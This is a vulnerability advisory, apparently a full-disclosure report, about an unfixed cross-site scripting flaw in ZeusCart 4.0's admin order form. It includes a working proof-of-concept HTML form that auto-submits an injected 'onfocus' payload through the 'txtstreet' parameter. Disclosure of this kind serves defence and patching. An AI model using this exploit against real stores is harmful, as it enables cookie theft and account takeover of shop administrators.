ZeusCart 4.0: XSS
Date: 2015-09-14 10:58:451. Introduction
| Affected Product: | ZeusCart 4.0 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Contact: | support@zeuscart.com |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 08/13/2015 |
| Disclosed to public: | 09/14/2015 |
| Release mode: | Full Disclosure |
| CVE: | n/a |
| Credits | Tim Coen of curesec GmbH |
2. Vulnerability Description
There is an XSS vulnerability via the "txtstreet" POST parameter when adding a new order. With this, it is possible to steal cookies or inject JavaScript keyloggers.
2. Proof of Concept
<form name="myform" method="post" action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create" >
<input type="hidden" name="hidOrderTotal" value="400">
<input type="hidden" name="discount" value="flat">
<input type="hidden" name="selCustomer" value="1">
<input type="hidden" name="payOption" value="8">
<input type="hidden" name="txtname" value="Primary">
<input type="hidden" name="txtstreet" value="foo autofocus onfocus=alert(1); bar">
</form>
<script>document.myform.submit();</script>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
| 08/13/2015 | Informed Vendor about Issue (no reply) |
| 09/07/2015 | Reminded Vendor of release date (no reply) |
| 09/14/2015 | Disclosed to public |